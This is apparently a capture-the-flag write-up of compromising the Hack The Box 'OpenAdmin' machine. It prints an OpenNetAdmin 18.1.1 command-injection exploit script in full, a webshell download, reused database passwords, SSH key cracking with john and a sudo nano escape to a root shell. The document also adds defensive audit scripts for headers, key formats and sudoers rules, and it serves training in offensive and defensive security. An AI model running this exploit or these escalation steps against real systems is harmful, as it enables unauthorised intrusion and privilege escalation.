Using AutoRecon I'll map the ports/services running on the VM.

sudo ~/tools/AutoRecon/ --single-target
[*] Scanning target
[*] Running service detection nmap-full-tcp on
[*] Running service detection nmap-top-20-udp on
[*] Running service detection nmap-quick on
[*] Service detection nmap-quick on finished successfully in 10 seconds
[*] Found ssh on tcp/22 on target
[*] Found http on tcp/80 on target
[*] Running task tcp/22/sslscan on
[*] Running task tcp/22/nmap-ssh on
[*] Running task tcp/80/sslscan on
[*] Running task tcp/80/nmap-http on
[*] Running task tcp/80/curl-index on
[*] Running task tcp/80/curl-robots on
[*] Running task tcp/80/wkhtmltoimage on
[*] Running task tcp/80/whatweb on
[*] Task tcp/22/sslscan on finished successfully in less than a second
[*] Task tcp/80/sslscan on finished successfully in less than a second
[*] Running task tcp/80/nikto on
[*] Running task tcp/80/gobuster on
[*] Task tcp/80/wkhtmltoimage on finished successfully in less than a second
[*] Task tcp/80/curl-robots on finished successfully in less than a second
[*] Task tcp/80/curl-index on finished successfully in less than a second
[!] Task tcp/80/gobuster on returned non-zero exit code: 1
[*] Task tcp/22/nmap-ssh on finished successfully in 3 seconds
[*] Task tcp/80/whatweb on finished successfully in 3 seconds
[*] Service detection nmap-top-20-udp on finished successfully in 19 seconds
[*] Task tcp/80/nmap-http on finished successfully in 26 seconds
[*] Service detection nmap-full-tcp on finished successfully in 48 seconds
[*] [11:48:15] - There is 1 task still running on
[*] [11:49:15] - There is 1 task still running on
[*] [11:50:15] - There is 1 task still running on
[*] [11:51:15] - There is 1 task still running on
[*] [11:52:15] - There is 1 task still running on
[*] [11:53:15] - There is 1 task still running on
[*] [11:54:16] - There is 1 task still running on
[*] Task tcp/80/nikto on finished successfully in 7 minutes, 14 seconds
[*] Finished scanning target in 7 minutes, 24 seconds
[*] Finished scanning all targets in 7 minutes, 25 seconds!

Nmap TCP results

# Nmap 7.80 scan initiated Tue Mar 10 11:47:16 2020 as: nmap -vv --reason -Pn -A --osscan-guess --version-all -p- -oN /home/kali/Desktop/HackTheBox/HackTheBox/machines/openadmin/scans/results/scans/_full_tcp_nmap.txt -oX /home/kali/Desktop/HackTheBox/HackTheBox/machines/openadmin/scans/results/scans/xml/_full_tcp_nmap.xml
Nmap scan report for
Host is up, received user-set (0.046s latency).
Scanned at 2020-03-10 11:47:16 EDT for 47s
Not shown: 65533 closed ports
Reason: 65533 resets
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCcVHOWV8MC41kgTdwiBIBmUrM8vGHUM2Q7+a0LCl9jfH3bIpmuWnzwev97wpc8pRHPuKfKm0c3iHGII+cKSsVgzVtJfQdQ0j/GyDcBQ9s1VGHiYIjbpX30eM2P2N5g2hy9ZWsF36WMoo5Fr+mPNycf6Mf0QOODMVqbmE3VVZE1VlX3pNW4ZkMIpDSUR89JhH+PHz/miZ1OhBdSoNWYJIuWyn8DWLCGBQ7THxxYOfN1bwhfYRCRTv46tiayuF2NNKWaDqDq/DXZxSYjwpSVelFV+vybL6nU0f28PzpQsmvPab4PtMUb0epaj4ZFcB1VVITVCdBsiu4SpZDdElxkuQJz
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHqbD5jGewKxd8heN452cfS5LS/VdUroTScThdV8IiZdTxgSaXN1Qga4audhlYIGSyDdTEL8x2tPAFPpvipRrLE=
|   256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBcV0sVI0yWfjKsl7++B9FGfOVeWAIWZ4YGEMROPxxk4
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.18 (94%), Linux 3.16 (93%), ASUS RT-N56U WAP (Linux 3.4) (93%), Oracle VM Server 3.4.2 (Linux 4.1) (93%), Android 4.1.1 (93%), Adtran 424RG FTTH gateway (92%)
No exact OS matches for host (If you know what OS is running on it, see ).
TCP/IP fingerprint:

Uptime guess: 14.909 days (since Mon Feb 24 12:58:57 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8080/tcp)
1   45.48 ms
2   45.75 ms

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at .
# Nmap done at Tue Mar 10 11:48:03 2020 -- 1 IP address (1 host up) scanned in 48.07 seconds

WhatWeb results:

WhatWeb report for
Status    : 200 OK
Title     : Apache2 Ubuntu Default Page: It works
IP        :
Country   : RESERVED, ZZ

Summary   : Apache[2.4.29], HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)]

Detected Plugins:
[ Apache ]
    The Apache HTTP Server Project is an effort to develop and 
    maintain an open-source HTTP server for modern operating 
    systems including UNIX and Windows NT. The goal of this 
    project is to provide a secure, efficient and extensible 
    server that provides HTTP services in sync with the current 
    HTTP standards. 

    Version      : 2.4.29 (from HTTP Server Header)
    Google Dorks: (3)
    Website     :

[ HTTPServer ]
    HTTP server header string. This plugin also attempts to 
    identify the operating system from the server header. 

    OS           : Ubuntu Linux
    String       : Apache/2.4.29 (Ubuntu) (from server string)

HTTP Headers:
    HTTP/1.1 200 OK
    Date: Tue, 10 Mar 2020 15:47:57 GMT
    Server: Apache/2.4.29 (Ubuntu)
    Last-Modified: Thu, 21 Nov 2019 14:08:45 GMT
    ETag: "2aa6-597dbd5dcea8b-gzip"
    Accept-Ranges: bytes
    Vary: Accept-Encoding
    Content-Encoding: gzip
    Content-Length: 3138
    Connection: close
    Content-Type: text/html

Nikto results:

- Nikto v2.1.6
+ Target IP:
+ Target Hostname:
+ Target Port:        80
+ Start Time:         2020-03-10 11:47:26 (GMT-4)
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 597dbd5dcea8b, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7863 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2020-03-10 11:54:40 (GMT-4) (434 seconds)
+ 1 host(s) tested
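Nikto's three header findings and its ETag remark can be re-checked offline against the header block WhatWeb captured above. The script below is an added example, not part of the original writeup or of Nikto or WhatWeb: it reads a response header block from stdin, reports which of the three headers Nikto looks for are absent, and only reports the ETag when it has the three-field inode-size-mtime shape, because Apache 2.4's default is `FileETag MTime Size` and the two-field ETag seen on this box (the `-gzip` suffix comes from mod_deflate) carries no inode. The sample header blocks are constructed; the first copies the headers shown above.

```shell
#!/bin/sh
# Added example, not part of the original writeup: audit a captured HTTP
# response header block for the three headers Nikto reported as missing, and
# re-check its ETag remark. Reads the headers on stdin, prints one finding
# per line. Apache 2.4 defaults to "FileETag MTime Size", so a two-field ETag
# (size-mtime, optionally with mod_deflate's "-gzip" suffix) carries no inode;
# only a three-field ETag means "FileETag INode MTime Size" is in effect.

WANTED="X-Frame-Options X-Content-Type-Options X-XSS-Protection"

check_headers() {
  hdrs=$(tr -d '\r')            # normalise CRLF so the ^ anchors match
  for h in $WANTED; do
    if ! printf '%s\n' "$hdrs" | grep -qi "^$h:"; then
      echo "missing: $h"
    fi
  done
  etag=$(printf '%s\n' "$hdrs" | grep -i '^ETag:' | head -n 1 \
         | sed -e 's/^[^:]*: *//' -e 's/"//g' -e 's/-gzip$//')
  if [ -n "$etag" ]; then
    fields=$(printf '%s\n' "$etag" | awk -F- '{ print NF }')
    if [ "$fields" -ge 3 ]; then
      echo "weak: ETag $etag has three fields, FileETag includes INode"
    fi
  fi
  return 0
}

# Number of findings for a header block on stdin.
count_findings() {
  check_headers | grep -c . || true
}

# Constructed sample 1: the headers WhatWeb captured from the target, copied
# from the listing above.
TARGET_HEADERS=$(cat <<'EOF'
HTTP/1.1 200 OK
Date: Tue, 10 Mar 2020 15:47:57 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Thu, 21 Nov 2019 14:08:45 GMT
ETag: "2aa6-597dbd5dcea8b-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 3138
Connection: close
Content-Type: text/html
EOF
)

# Constructed sample 2: the same response after the headers are added with
# mod_headers; FileETag left at the 2.4 default.
HARDENED_HEADERS=$(cat <<'EOF'
HTTP/1.1 200 OK
Server: Apache
ETag: "2aa6-597dbd5dcea8b"
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Security-Policy: default-src 'self'
Content-Type: text/html
EOF
)

# Constructed sample 3: headers set, but "FileETag INode MTime Size" in force.
INODE_HEADERS=$(cat <<'EOF'
HTTP/1.1 200 OK
ETag: "3e8f1-2aa6-597dbd5dcea8b"
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
EOF
)

report() {   # report NAME HEADERS
  echo "== $1: $(printf '%s\n' "$2" | count_findings) finding(s)"
  printf '%s\n' "$2" | check_headers
}
report target "$TARGET_HEADERS"
report hardened "$HARDENED_HEADERS"
report inode-etag "$INODE_HEADERS"
```

Setting the headers with mod_headers (`Header always set X-Frame-Options "SAMEORIGIN"` and so on) and leaving FileETag at its default clears every finding. X-XSS-Protection is ignored by current browsers; a Content-Security-Policy is the durable replacement, which is why the hardened sample carries one even though the check only asks for Nikto's three headers.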

Using dirsearch to enumerate hidden directories

kali@kali:~/tools/dirsearch$ ./ -u -ephp,bak,ini,zip -x403

 _|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )

Extensions: php, bak, ini, zip | HTTP method: get | Threads: 10 | Wordlist size: 7208

Error Log: /home/kali/tools/dirsearch/logs/errors-20-02-27_05-31-51.log


[05:31:51] Starting: 
[05:32:38] 200 -   11KB - /index.html
[05:32:46] 301 -  312B  - /music  ->

Task Completed

The web server root (/) is not configured: connecting to it returns the landing page of a fresh Apache installation. Dirsearch revealed another path, /music, which we will explore now.


Some links are not working; the most interesting is the login link, which opens an unprotected guest account of an OpenNetAdmin installation (screenshot-music-site.png).

We can observe that the OpenNetAdmin version is 18.1.1.

After the reconnaissance phase we know that the target runs the following software/services:

OpenSSH 7.6p1
Apache 2.4.29
OpenNetAdmin 18.1.1


Looking in ExploitDB, we find some exploits:

root@kali:~# searchsploit apache 2.4
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                |  Path
                                                                                                              | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
Apache 2.2.4 - 413 Error HTTP Request Method Cross-Site Scripting                                             | exploits/unix/remote/
Apache 2.4.17 - Denial of Service                                                                             | exploits/windows/dos/39037.php
Apache 2.4.17 < 2.4.38 - 'apache2ctl graceful' 'logrotate' Local Privilege Escalation                         | exploits/linux/local/46676.php
Apache 2.4.23 mod_http2 - Denial of Service                                                                   | exploits/linux/dos/
Apache 2.4.7 + PHP 7.0.2 - 'openssl_seal()' Uninitialized Memory Code Execution                               | exploits/php/remote/40142.php
Apache 2.4.7 mod_status - Scoreboard Handling Race Condition                                                  | exploits/linux/dos/34133.txt
Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory Leak                                                              | exploits/linux/webapps/
Apache Tomcat 3.2.3/3.2.4 - 'RealPath.jsp' Information Disclosuree                                            | exploits/multiple/remote/21492.txt
Apache Tomcat 3.2.3/3.2.4 - 'Source.jsp' Information Disclosure                                               | exploits/multiple/remote/21490.txt
Apache Tomcat 3.2.3/3.2.4 - Example Files Web Root Full Path Disclosure                                       | exploits/multiple/remote/21491.txt
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
root@kali:~# searchsploit openssh 7
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                |  Path
                                                                                                              | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
Dropbear / OpenSSH Server - 'MAX_UNAUTH_CLIENTS' Denial of Service                                            | exploits/multiple/dos/
FreeBSD OpenSSH 3.5p1 - Remote Command Execution                                                              | exploits/freebsd/remote/17462.txt
OpenSSH 2.3 < 7.7 - Username Enumeration                                                                      | exploits/linux/remote/
OpenSSH 2.3 < 7.7 - Username Enumeration (PoC)                                                                | exploits/linux/remote/
OpenSSH 3.x - Challenge-Response Buffer Overflow (1)                                                          | exploits/unix/remote/21578.txt
OpenSSH 3.x - Challenge-Response Buffer Overflow (2)                                                          | exploits/unix/remote/21579.txt
OpenSSH 6.8 < 6.9 - 'PTY' Local Privilege Escalation                                                          | exploits/linux/local/41173.c
OpenSSH 7.2 - Denial of Service                                                                               | exploits/linux/dos/
OpenSSH 7.2p1 - (Authenticated) xauth Command Injection                                                       | exploits/multiple/remote/
OpenSSH 7.2p2 - Username Enumeration                                                                          | exploits/linux/remote/
OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation          | exploits/linux/local/40962.txt
OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading                                                      | exploits/linux/remote/40963.txt
OpenSSH < 7.7 - User Enumeration (2)                                                                          | exploits/linux/remote/
OpenSSHd 7.2p2 - Username Enumeration                                                                         | exploits/linux/remote/40113.txt
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
root@kali:~# searchsploit opennetadmin 
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                |  Path
                                                                                                              | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
OpenNetAdmin 13.03.01 - Remote Code Execution                                                                 | exploits/php/webapps/26682.txt
OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit)                                                  | exploits/php/webapps/47772.rb
OpenNetAdmin 18.1.1 - Remote Code Execution                                                                   | exploits/php/webapps/
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

The options are:

  • Apache 2.4.17 < 2.4.38 - 'apache2ctl graceful' 'logrotate' Local Privilege Escalation (aka Carpe diem)

  • OpenSSH 2.3 < 7.7 - Username Enumeration

  • OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit)

  • OpenNetAdmin 18.1.1 - Remote Code Execution

The first one is a local privilege escalation exploit; maybe we could use it later.

The OpenSSH vulnerability could be useful to check usernames.

I won't check these two vulnerabilities right now; I'm focusing on the OpenNetAdmin vulnerability.

This is the exploit:

# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage:
# Software Link:
# Version: v18.1.1
# Tested on: Linux

# Exploit Title: OpenNetAdmin v18.1.1 RCE
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage:
# Software Link:
# Version: v18.1.1
# Tested on: Linux


URL="${1}"   # target URL, passed as the first argument (assumed: the listing omits this line and the closing "done")
while true;do
 echo -n "$ "; read cmd
 curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done

It injects the command into the POST request and prints the output captured between the BEGIN and END markers. The script works, and I upload a webshell into Apache's document root.

kali@kali:~/Desktop/HackTheBox/HackTheBox/machines/openadmin$ bash 
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ pwd
$ curl -O myShell.php     

The webshell! I have a foothold inside (webshell.png).

It is possible to look at some sensitive files, such as /etc/passwd (webshell.png).

There are only two users with a login shell defined, so they are the only users who can use interactive shells:


Exploring the filesystem I found an interesting file (webshell.png): credentials for a DB connection, it seems.


$ona_contexts=array (
  'DEFAULT' => 
  array (
    'databases' => 
    array (
      0 => 
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
    'description' => 'Default data context',
    'context_color' => '#D3DBFF',


Password reuse is a very common scenario, so I try the password found here with the users listed in /etc/passwd.

kali@kali:~/Desktop/HackTheBox/HackTheBox/machines/openadmin$ ssh joanna@
joanna@'s password: 
Permission denied, please try again.
joanna@'s password: 

kali@kali:~/Desktop/HackTheBox/HackTheBox/machines/openadmin$ ssh jimmy@
jimmy@'s password: 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

 * Documentation:
 * Management:
 * Support:

  System information as of Wed Mar 11 00:04:47 UTC 2020

  System load:  0.0               Processes:             112
  Usage of /:   49.3% of 7.81GB   Users logged in:       0
  Memory usage: 18%               IP address for ens160:
  Swap usage:   0%

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:

41 packages can be updated.
12 updates are security updates.

Last login: Thu Jan  2 20:50:03 2020 from

Again, a password reuse case. Looking for the files owned by the user jimmy, I found:


The Apache configuration shows an internal-facing website, accessible only from within the VM.

jimmy@openadmin:/etc/apache2/sites-enabled$ ls
internal.conf  openadmin.conf
jimmy@openadmin:/etc/apache2/sites-enabled$ cat internal.conf 

    ServerName internal.openadmin.htb
    DocumentRoot /var/www/internal

<IfModule mpm_itk_module>
AssignUserID joanna joanna

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined


This virtual host will run as the joanna user.

Looking inside the /var/www/internal directory I found some credentials hardcoded inside the index.php file:

            $msg = '';

            if (isset($_POST['login']) && !empty($_POST['username']) && !empty($_POST['password'])) {
              if ($_POST['username'] == 'jimmy' && hash('sha512',$_POST['password']) == '00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1') {
                  $_SESSION['username'] = 'jimmy';
                  header("Location: /main.php");
              } else {
                  $msg = 'Wrong username or password.';

The main.php file also shows interesting things:

<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); }; 
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session

The session check only sends a redirect header and does not stop the script, so the shell_exec() output is still written into the response body for anyone who requests main.php. It will be possible to get the joanna user's private SSH key with a simple curl:

jimmy@openadmin:/var/www/internal$ curl
<pre>-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D

<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session

I copied the key into a file in the /tmp directory, then tried to connect to the system as the joanna user.

jimmy@openadmin:/tmp$ chmod 600 joanna-private-key 
jimmy@openadmin:/tmp$ ssh -i joanna-private-key joanna@0
The authenticity of host '0 (' can't be established.
ECDSA key fingerprint is SHA256:loIRDdkV6Zb9r8OMF3jSDMW3MnV5lHgn4wIRq+vmBJY.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '0,' (ECDSA) to the list of known hosts.
Enter passphrase for key 'joanna-private-key': 


The key is protected by a passphrase, so I try to crack it.

kali@kali:~/Desktop/HackTheBox/HackTheBox/machines/openadmin/loots$ /usr/share/john/ joanna-priv-key > joanna-priv-key-hash
kali@kali:~/Desktop/HackTheBox/HackTheBox/machines/openadmin/loots$ cat joanna-priv-key-hash 
kali@kali:~/Desktop/HackTheBox/HackTheBox/machines/openadmin/loots$ /usr/sbin/john joanna-priv-key-hash  -wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas      (joanna-priv-key)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:04 DONE (2020-03-11 06:03) 0.2132g/s 3057Kp/s 3057Kc/s 3057KC/sa6_123..*7¡Vamos!
Session completed
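The john output tells the defender's side of this story: the key is in the legacy PEM format (Proc-Type / DEK-Info headers), whose key derivation is a single MD5 round ("KDF 0", "iteration count 1" in the cost lines above), so a weak passphrase falls at millions of guesses per second. The script below is an added example, not from the writeup or from john; it classifies a private key file from its header so an administrator can find such keys in a home directory. All three sample keys are constructed: the first reuses only the header lines shown above with a placeholder body, the second is a hand-built openssh-key-v1 preamble naming aes256-ctr and bcrypt, and the third is an unencrypted PEM.

```shell
#!/bin/sh
# Added example, not part of the original writeup or of john: classify an SSH
# private key by its on-disk format so weakly protected keys can be found.
# Legacy PEM keys ("Proc-Type: 4,ENCRYPTED" + "DEK-Info: cipher,iv") derive
# the cipher key from the passphrase with one round of MD5, the "KDF 0 /
# iteration count 1" cost john printed above; the openssh-key-v1 format uses
# bcrypt with a configurable round count.
# Output is one of:
#   legacy-pem-encrypted <cipher> | openssh-format <kdf> | unencrypted-pem | unknown

classify_key() {
  file=$1
  case "$(head -n 1 "$file")" in
    '-----BEGIN OPENSSH PRIVATE KEY-----')
      # the base64 body starts with the magic, then cipher name, then kdf name
      if grep -v '^-----' "$file" | base64 -d 2>/dev/null | grep -aq 'bcrypt'; then
        echo "openssh-format bcrypt"
      else
        echo "openssh-format none"
      fi
      ;;
    '-----BEGIN '*' PRIVATE KEY-----')
      if grep -q '^Proc-Type: 4,ENCRYPTED' "$file"; then
        cipher=$(sed -n 's/^DEK-Info: *\([^,]*\),.*/\1/p' "$file")
        echo "legacy-pem-encrypted ${cipher:-unknown-cipher}"
      else
        echo "unencrypted-pem"
      fi
      ;;
    *)
      echo "unknown"
      ;;
  esac
}

# Print "path: class" for every regular file in a directory.
audit_keys() {
  for f in "$1"/*; do
    [ -f "$f" ] || continue
    echo "$f: $(classify_key "$f")"
  done
}

SAMPLE_DIR=$(mktemp -d)

# Constructed sample 1: the header lines of the key recovered from main.php
# above, with a placeholder body (not a real key).
cat > "$SAMPLE_DIR/joanna-legacy.key" <<'EOF'
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D

PLACEHOLDERBODYNOTAREALKEY==
-----END RSA PRIVATE KEY-----
EOF

# Constructed sample 2: a new-format key reduced to its preamble: the
# "openssh-key-v1\0" magic, then the length-prefixed cipher and kdf names.
{
  echo '-----BEGIN OPENSSH PRIVATE KEY-----'
  printf 'openssh-key-v1\0\0\0\0\012aes256-ctr\0\0\0\006bcrypt' | base64
  echo '-----END OPENSSH PRIVATE KEY-----'
} > "$SAMPLE_DIR/modern.key"

# Constructed sample 3: a legacy PEM key with no passphrase at all.
cat > "$SAMPLE_DIR/plain.key" <<'EOF'
-----BEGIN RSA PRIVATE KEY-----
PLACEHOLDERBODYNOTAREALKEY==
-----END RSA PRIVATE KEY-----
EOF

audit_keys "$SAMPLE_DIR"
```

A legacy key is re-wrapped in the new format with `ssh-keygen -p -o -a 100 -f joanna-private-key`, which switches the protection to bcrypt with 100 rounds and makes each guess cost orders of magnitude more. The larger fix on this box is of course that main.php should never read a private key at all.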

The key passphrase is bloodninjas, so I can connect as the joanna user and find the user flag:

jimmy@openadmin:/tmp$ ssh -i joanna-private-key joanna@0
Enter passphrase for key 'joanna-private-key': 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

 * Documentation:
 * Management:
 * Support:

  System information as of Wed Mar 11 10:06:30 UTC 2020

  System load:  0.0               Processes:             112
  Usage of /:   49.6% of 7.81GB   Users logged in:       1
  Memory usage: 27%               IP address for ens160:
  Swap usage:   0%

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:

41 packages can be updated.
12 updates are security updates.

Failed to connect to Check your Internet connection or proxy settings

Last login: Thu Jan  2 21:12:40 2020 from
joanna@openadmin:~$ ls
joanna@openadmin:~$ cat user.txt 

Now we have to work out a privilege escalation to find the root flag. In the reconnaissance phase I found a vulnerability in the Apache web server that can lead to privilege escalation, but we can't use it: it relies on logrotate, which we can't trigger as the joanna user. Doing some reconnaissance as joanna to find something useful, I found that joanna has a sudoers entry:

joanna@openadmin:~$ ls -la /etc/sudoers.d/joanna 
-rw-r--r-- 1 root root 46 Nov 22 23:50 /etc/sudoers.d/joanna
joanna@openadmin:~$ cat /etc/sudoers.d/joanna 
joanna ALL=(ALL) NOPASSWD:/bin/nano /opt/priv
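The sudoers rule above is the textbook case of a restricted command that is not restrictive: nano can open any file and run commands once it is up. The script below is an added example, not part of the writeup; it parses sudoers-format files, extracts each rule's command list and flags programs known to offer a shell or file escape, plus the bare ALL. The three sample files are constructed; the first is the rule found on the box.

```shell
#!/bin/sh
# Added example, not part of the original writeup: find sudoers rules that
# grant a program with a built-in shell or file escape (editors, pagers) or
# the bare ALL. /etc/sudoers.d/joanna above is the pattern this catches:
# nano as root on one file is nano as root on every file, and on a shell.

# Interactive programs that can run commands or open other files once started.
ESCAPE_BINS="nano pico vi vim vim.basic vim.tiny emacs less more man"

# Usage: audit_sudoers FILE...  -> prints "file: rule [reason]" per risky rule
audit_sudoers() {
  for f in "$@"; do
    grep -v '^[[:space:]]*#' "$f" | grep -v '^Defaults' | grep '=' \
    | while IFS= read -r rule; do
        cmds=${rule#*=}          # drop "user HOSTS="
        cmds=${cmds#*)}          # drop "(runas)" when present
        cmds=$(printf '%s' "$cmds" | sed 's/[A-Z][A-Z]*: *//g')   # drop NOPASSWD: etc.
        printf '%s\n' "$cmds" | tr ',' '\n' | while IFS= read -r spec; do
          spec=$(printf '%s' "$spec" | sed 's/^ *//')
          [ -n "$spec" ] || continue
          prog=${spec%% *}       # program path, before its arguments
          if [ "$prog" = "ALL" ]; then
            echo "$f: $rule [ALL: unrestricted root]"
            continue
          fi
          prog=${prog##*/}
          for b in $ESCAPE_BINS; do
            if [ "$prog" = "$b" ]; then
              echo "$f: $rule [$b can spawn a shell; use sudoedit]"
            fi
          done
        done
      done
  done
  return 0
}

# Number of risky rules across the given files.
count_risky() {
  audit_sudoers "$@" | grep -c . || true
}

SAMPLE_DIR=$(mktemp -d)

# Constructed sample 1: the rule found in /etc/sudoers.d/joanna above.
printf '%s\n' 'joanna ALL=(ALL) NOPASSWD:/bin/nano /opt/priv' > "$SAMPLE_DIR/joanna"

# Constructed sample 2: the same intent expressed safely, plus a service restart.
cat > "$SAMPLE_DIR/joanna-fixed" <<'EOF'
# let joanna edit /opt/priv as root without handing her an editor running as root
joanna ALL=(root) NOPASSWD: sudoedit /opt/priv
ops    ALL=(root) /bin/systemctl restart apache2
EOF

# Constructed sample 3: two more rules of the risky kind.
cat > "$SAMPLE_DIR/others" <<'EOF'
admin ALL=(ALL) ALL
dev   ALL=(root) NOPASSWD: /usr/bin/less /var/log/syslog, /usr/bin/vim.tiny /etc/motd
EOF

audit_sudoers "$SAMPLE_DIR"/*
```

The fix for "let joanna edit /opt/priv as root" is `joanna ALL=(root) NOPASSWD: sudoedit /opt/priv`: sudoedit copies the file to a temporary location, runs the user's own editor unprivileged, and only the write-back happens as root, so any editor escape runs as joanna.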

Privilege Escalation

The joanna user can run /bin/nano as root, without a password, on /opt/priv. So basically we run the command, open the root home directory from within nano and read the flag.

joanna@openadmin:~$ sudo /bin/nano /opt/priv



The root flag is 2f907ed450b361b2c2bf4e8795d5b561

We can also get a root shell using nano. Once the nano interface is open, the ^R^X key sequence (Control-R, then Control-X) allows a command to be executed. So using the command

reset; sh 1>&0 2>&0

we obtain a root shell (rootshell1.png).


- lilloX
